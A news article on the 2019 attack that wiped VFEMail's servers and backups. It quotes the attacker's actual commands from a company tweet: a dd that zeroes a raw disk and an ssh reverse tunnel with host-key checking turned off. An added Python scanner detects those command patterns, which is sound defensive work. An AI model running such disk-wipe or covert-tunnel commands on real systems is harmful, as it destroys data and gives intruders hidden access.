- Email provider VFEMail suffered a large-scale attack that saw all of the company’s servers and backups being wiped.
- The provider revealed that the attack occurred on February 11 and it was much more complex than SSH exploits.
- The service is back up, but secondary domains continue to remain unavailable.
Email provider VFEMail revealed that all customer data from its US servers was wiped by hackers on February 11. The company’s webmail and client were taken down to investigate the attack, and the provider found that all of the data, including backups and file servers, was missing. The attack was complex in nature, and its goal was to delete all data, unlike most other server attacks, which seek ransoms.
VFEMail is currently trying to recover user emails, but it is unlikely that it will be able to. The official website has been restored, but all secondary domains are still unavailable. Existing users who log in will find empty inboxes and also receive an explanation of what happened. VFEMail has not revealed what its next course of action will be or whether it will continue to operate as a service.
Caught the perp in the middle of formatting the backup server:
dd if=/dev/zero of=/dev/da0 bs=4194304 seek=1024 count=399559
via: ssh -v -oStrictHostKeyChecking=no -oLogLevel=error -oUserKnownHostsFile=/dev/null [email protected] -R 127.0.0.1:30081:127.0.0.1:22 -N
— VFEmail.net (@VFEmail) February 11, 2019
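The two commands in the tweet are also a usable detection signature for a defender. The following Python scanner is an added example, not code from the tweet or from VFEmail: it walks command lines in the shape a shell history or an auditd EXECVE record would yield and flags a dd that overwrites a raw block device from /dev/zero, and an ssh invocation that combines a reverse tunnel (-R with -N) with host-key checking disabled. The sample command lines are constructed, with a placeholder host standing in for the redacted one.

```python
import re
import shlex

# Constructed sample command lines; the first two mirror the commands VFEmail
# reported, the last two are benign look-alikes that must not be flagged.
SAMPLE_COMMANDS = [
    "dd if=/dev/zero of=/dev/da0 bs=4194304 seek=1024 count=399559",
    "ssh -v -oStrictHostKeyChecking=no -oLogLevel=error "
    "-oUserKnownHostsFile=/dev/null backup@host.example "
    "-R 127.0.0.1:30081:127.0.0.1:22 -N",
    "dd if=/dev/zero of=/tmp/swapfile bs=1M count=1024",
    "ssh -o StrictHostKeyChecking=yes admin@host.example uptime",
]

# Whole-disk and partition device names on Linux and FreeBSD (da0 is FreeBSD).
RAW_BLOCK_DEVICE = re.compile(
    r"^/dev/(sd[a-z]+\d*|da\d+|nvme\d+n\d+(p\d+)?|vd[a-z]+\d*|xvd[a-z]+\d*)$")
WIPE_SOURCES = {"/dev/zero", "/dev/urandom", "/dev/random"}

def dd_findings(argv):
    """dd takes key=value operands; flag raw-device targets fed from a wipe source."""
    opts = dict(a.split("=", 1) for a in argv[1:] if "=" in a)
    out = []
    if RAW_BLOCK_DEVICE.match(opts.get("of", "")):
        out.append("dd writes directly to block device " + opts["of"])
        if opts.get("if") in WIPE_SOURCES:
            out.append("dd source is a zero/random device (overwrite, not copy)")
    return out

def ssh_findings(argv):
    """Collect -o options (attached or separate) plus the -R and -N flags."""
    opts, has_reverse, no_command = [], False, False
    it = iter(argv[1:])
    for tok in it:
        if tok.startswith("-o"):                       # -oKey=val or -o Key=val
            opts.append((tok[2:] or next(it, "")).replace(" ", "").lower())
        elif tok.startswith("-R"):                     # -R spec or -Rspec
            has_reverse = True
            if tok == "-R":
                next(it, None)                         # consume the port spec
        elif tok.startswith("-") and "N" in tok[1:]:   # -N, possibly bundled
            no_command = True
    out = []
    if "stricthostkeychecking=no" in opts:
        out.append("ssh host key checking disabled")
    if "userknownhostsfile=/dev/null" in opts:
        out.append("ssh known_hosts discarded (no record of the peer)")
    if has_reverse and no_command:
        out.append("ssh reverse tunnel held open with no remote command")
    return out

def scan(commands):
    """Return {command: [findings]} for every command line that trips a rule."""
    findings = {}
    for cmd in commands:
        argv = shlex.split(cmd)
        prog = argv[0].rsplit("/", 1)[-1] if argv else ""
        hits = {"dd": dd_findings, "ssh": ssh_findings}.get(prog, lambda a: [])(argv)
        if hits:
            findings[cmd] = hits
    return findings
```

The ssh rule fires on the combination of flags, not on ssh itself; a backup job that uses -R legitimately can be allow-listed by host.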
This is not the first time VFEMail has suffered a cyber attack: the email provider was previously targeted by Armada Collective. The group had targeted VFEMail and a number of other providers and demanded ransoms to stop its DDoS attacks. The largest known ransom paid to attackers was by South Korean web hosting company Nayana, which paid $1 million to decrypt customer data that had been seized.
Hackers usually steal or leak data; there have been very few incidents in history involving complete deletion on such a large scale. The biggest incident to date involves IaaS company Code Spaces, which was forced to shut down following a full data wipe by hackers. Most modern-day attacks involve hackers using compromised servers to gain access to private user data or to host malware and botnets. Victims are then asked to pay a ransom to have normal access restored.